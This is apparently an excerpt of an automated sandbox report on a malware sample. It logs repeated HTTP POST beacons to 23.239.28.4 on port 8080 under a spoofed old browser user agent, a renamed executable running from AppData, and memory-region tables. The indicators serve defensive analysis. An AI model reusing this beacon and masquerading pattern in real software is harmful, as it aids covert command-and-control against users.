| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 23.239.28.4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
18 |
HTTP Session #6
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 23.239.28.4 |
| Server Port | 8080 |
| Data Sent | 329 |
| Data Received | 156 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 23.239.28.4, server_port = 8080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 23.239.28.4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
18 |
HTTP Session #7
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 23.239.28.4 |
| Server Port | 8080 |
| Data Sent | 329 |
| Data Received | 156 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 23.239.28.4, server_port = 8080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 23.239.28.4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
18 |
HTTP Session #8
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 23.239.28.4 |
| Server Port | 8080 |
| Data Sent | 329 |
| Data Received | 156 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 23.239.28.4, server_port = 8080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 23.239.28.4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
18 |
HTTP Session #9
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 23.239.28.4 |
| Server Port | 8080 |
| Data Sent | 329 |
| Data Received | 156 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 23.239.28.4, server_port = 8080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 23.239.28.4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
18 |
HTTP Session #10
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 23.239.28.4 |
| Server Port | 8080 |
| Data Sent | 329 |
| Data Received | 156 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 23.239.28.4, server_port = 8080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 23.239.28.4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
18 |
HTTP Session #11
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 23.239.28.4 |
| Server Port | 8080 |
| Data Sent | 329 |
| Data Received | 156 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 23.239.28.4, server_port = 8080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 23.239.28.4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
18 |
HTTP Session #12
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 23.239.28.4 |
| Server Port | 8080 |
| Data Sent | 329 |
| Data Received | 156 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 23.239.28.4, server_port = 8080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 23.239.28.4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
18 |
HTTP Session #13
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 23.239.28.4 |
| Server Port | 8080 |
| Data Sent | 329 |
| Data Received | 156 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 23.239.28.4, server_port = 8080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 23.239.28.4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
18 |
HTTP Session #14
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 23.239.28.4 |
| Server Port | 8080 |
| Data Sent | 329 |
| Data Received | 156 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 23.239.28.4, server_port = 8080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 23.239.28.4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
18 |
HTTP Session #15
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 23.239.28.4 |
| Server Port | 8080 |
| Data Sent | 329 |
| Data Received | 156 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 23.239.28.4, server_port = 8080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 23.239.28.4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
18 |
HTTP Session #16
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 23.239.28.4 |
| Server Port | 8080 |
| Data Sent | 329 |
| Data Received | 156 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 23.239.28.4, server_port = 8080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 23.239.28.4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
18 |
HTTP Session #17
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 23.239.28.4 |
| Server Port | 8080 |
| Data Sent | 329 |
| Data Received | 156 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 23.239.28.4, server_port = 8080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 23.239.28.4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
18 |
HTTP Session #18
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 23.239.28.4 |
| Server Port | 8080 |
| Data Sent | 329 |
| Data Received | 156 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 23.239.28.4, server_port = 8080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 23.239.28.4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
18 |
Process #15: narrowexisting.exe
179
0
| Information | Value |
|---|---|
| ID | #15 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" /scomma "C:\ProgramData\114E.tmp" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:02:41, Reason: Child Process |
| Unmonitor | End Time: 00:03:32, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:51 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x570 |
| Parent PID | 0xa68 (c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
11C
0x
B10
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000000210000 | 0x00210000 | 0x00210fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x0025ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000330000 | 0x00330000 | 0x003affff | Private Memory | Readable, Writable |
|
|
|
- |
| 5kyzze.exe | 0x00400000 | 0x00420fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000430000 | 0x00430000 | 0x0052ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000005b0000 | 0x005b0000 | 0x005bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x006bffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000006c0000 | 0x006c0000 | 0x00847fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000850000 | 0x00850000 | 0x009d0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000009e0000 | 0x009e0000 | 0x01ddffff | Pagefile Backed Memory | Readable |
|
|
|
- |
